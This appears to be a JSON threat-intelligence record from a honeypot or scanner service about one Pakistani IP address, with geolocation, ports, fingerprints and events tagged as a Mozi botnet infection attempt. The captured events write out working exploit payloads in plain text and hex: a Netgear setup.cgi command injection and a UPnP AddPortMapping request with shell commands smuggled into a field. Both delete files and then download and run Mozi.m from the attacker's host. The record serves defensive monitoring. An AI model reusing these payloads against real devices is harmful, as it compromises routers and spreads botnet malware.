{"ip":"110.37.44.158","total_events":3,"verdict":{"verdict":"probing","label":"Low-level probing","detail":null,"confidence":"low","network_type":"residential ISP"},"first_seen":"2026-03-26T22:33:04","last_seen":"2026-06-25T05:49:37","events_24h":1,"events_7d":1,"geo":{"country_code":"PK","country_name":"Pakistan","region":"Punjab","city":"Lahore","lat":31.5826,"lon":74.3276,"asn":38264,"org":"National WiMAX/IMS environment"},"source_domain":"GPONUser3744-158.wateen.net","known_scanners":[],"scanner_tag":{"key":"peeringdb:as38264","label":"Wateen Telecom","category":"isp","url":"https://www.peeringdb.com/asn/38264"},"cve_matches":[],"top_ports":[{"port":52869,"proto":"tcp","label":"","count":2},{"port":80,"proto":"tcp","label":"HTTP","count":1}],"fingerprints":{"ssh_hassh":[],"tls_ja4":[],"tls_ja3":[],"ja4h":["ge10nn0000_000000000000"]},"fingerprint_peers":{"ge10nn0000_000000000000":2043},"user_agents":[],"timeline":[{"date":"2026-06-25","count":1}],"recent_events":[{"timestamp":"2026-06-25T05:49:37","port":80,"proto":"tcp","app_proto":"","app_protocol":"http","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://110.37.44.158:58509/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1","summary":"","payload_hex":"474554202f73657475702e6367693f6e6578745f66696c653d6e6574676561722e63666726746f646f3d737973636d6426636d643d726d2b2d72662b2f746d702f2a3b776765742b687474703a2f2f3131302e33372e34342e3135383a35383530392f4d6f7a692e6d2b2d4f2b2f746d702f6e6574676561723b73682b6e65746765617226637572706174683d2f2663757272656e7473657474696e672e68746d3d3120485454502f312e300d0a0d0a","method":"GET","user_agent":"","community_id":"1:1vbLtw+b4FSxavgAKcud6pwEihc=","ja3":"","session":"14e27df8-5a00-4500-8b6c-62f8f4f36716","seq":1,"duration_ms":100,"bytes_in":176,"bytes_out":78},{"timestamp":"2026-03-26T22:33:04","port":52869,"proto":"tcp","app_proto":"","app_protocol":"","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"","summary":"OST /picsdesc.xml HTTP/1.1\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: /\r\nUser-Agent: Hello-World\r\nConnection: keep-alive\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope//\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://110.37.44.158:52674/Mozi.m; chmod +x Mozi.m; ./Mozi.m</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\r\n\r\n","payload_hex":"4f5354202f70696373646573632e786d6c20485454502f312e310d0a436f6e74656e742d4c656e6774683a203633300d0a4163636570742d456e636f64696e673a20677a69702c206465666c6174650d0a534f4150416374696f6e3a2075726e3a736368656d61732d75706e702d6f72673a736572766963653a57414e4950436f6e6e656374696f6e3a3123416464506f72744d617070696e670d0a4163636570743a202f0d0a557365722d4167656e743a2048656c6c6f2d576f726c640d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a0d0a3c3f786d6c2076657273696f6e3d22312e3022203f3e3c733a456e76656c6f706520786d6c6e733a733d22687474703a2f2f736368656d61732e786d6c736f61702e6f72672f736f61702f656e76656c6f70652f2f2220733a656e636f64696e675374796c653d22687474703a2f2f736368656d61732e786d6c736f61702e6f72672f736f61702f656e636f64696e672f223e3c733a426f64793e3c753a416464506f72744d617070696e6720786d6c6e733a753d2275726e3a736368656d61732d75706e702d6f72673a736572766963653a57414e4950436f6e6e656374696f6e3a31223e3c4e657752656d6f7465486f73743e3c2f4e657752656d6f7465486f73743e3c4e657745787465726e616c506f72743e34373435303c2f4e657745787465726e616c506f72743e3c4e657750726f746f636f6c3e5443503c2f4e657750726f746f636f6c3e3c4e6577496e7465726e616c506f72743e34343338323c2f4e6577496e7465726e616c506f72743e3c4e6577496e7465726e616c436c69656e743e6364202f7661722f3b207767657420687474703a2f2f3131302e33372e34342e3135383a35323637342f4d6f7a692e6d3b2063686d6f64202b78204d6f7a692e6d3b202e2f4d6f7a692e6d3c2f4e6577496e7465726e616c436c69656e743e3c4e6577456e61626c65643e313c2f4e6577456e61626c65643e3c4e6577506f72744d617070696e674465736372697074696f6e3e73796e637468696e673c2f4e6577506f72744d617070696e674465736372697074696f6e3e3c4e65774c656173654475726174696f6e3e303c2f4e65774c656173654475726174696f6e3e3c2f753a416464506f72744d617070696e673e3c2f733a426f64793e3c2f733a456e76656c6f70653e0d0a0d0a","method":"","user_agent":"","community_id":"1:locAsyLz2dUHJqipTQNW2qYkVzk=","ja3":"","session":"d993dcf6-3c6e-406a-9a93-dd3482df9c8c","seq":0,"duration_ms":0,"bytes_in":0,"bytes_out":0,"enriched":{"digest":"82e885ee715ae2ee","strings":["OST /picsdesc.xml HTTP/1.1","Content-Length: 630","Accept-Encoding: gzip, deflate","SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping","Accept: /","User-Agent: Hello-World","Connection: keep-alive","<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envel…"],"iocs":{"urls":["http://schemas.xmlsoap.org/soap/envel…"],"domains":["schemas.xmlsoap.org"],"paths":["/schemas.xmlsoap.org/soap/envel"]}}},{"timestamp":"2026-03-26T22:33:04","port":52869,"proto":"tcp","app_proto":"","app_protocol":"","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"","summary":"P","payload_hex":"50","method":"","user_agent":"","community_id":"1:locAsyLz2dUHJqipTQNW2qYkVzk=","ja3":"","session":"d993dcf6-3c6e-406a-9a93-dd3482df9c8c","seq":0,"duration_ms":0,"bytes_in":0,"bytes_out":0}],"http_methods":[{"method":"GET","count":1}],"distinct_ports_total":2,"top_paths":[{"path":"/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://110.37.44.158:58509/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1","count":1,"ports":1}],"distinct_paths_total":1,"top_snis":[],"top_hosts":[],"top_alpns":[],"banners":[],"credentials":[],"header_profile":null,"tags":[{"tag_id":"Mozi Botnet Infection Attempt","tag_type":"malware","title":"Mozi Botnet Infection Attempt","severity":"CRITICAL","actively_exploited":false,"match_field":"url_path","matched_pattern":"Mozi.m","reference_urls":[]}],"data_as_of":"2026-06-25T21:23:31.507641+00:00"}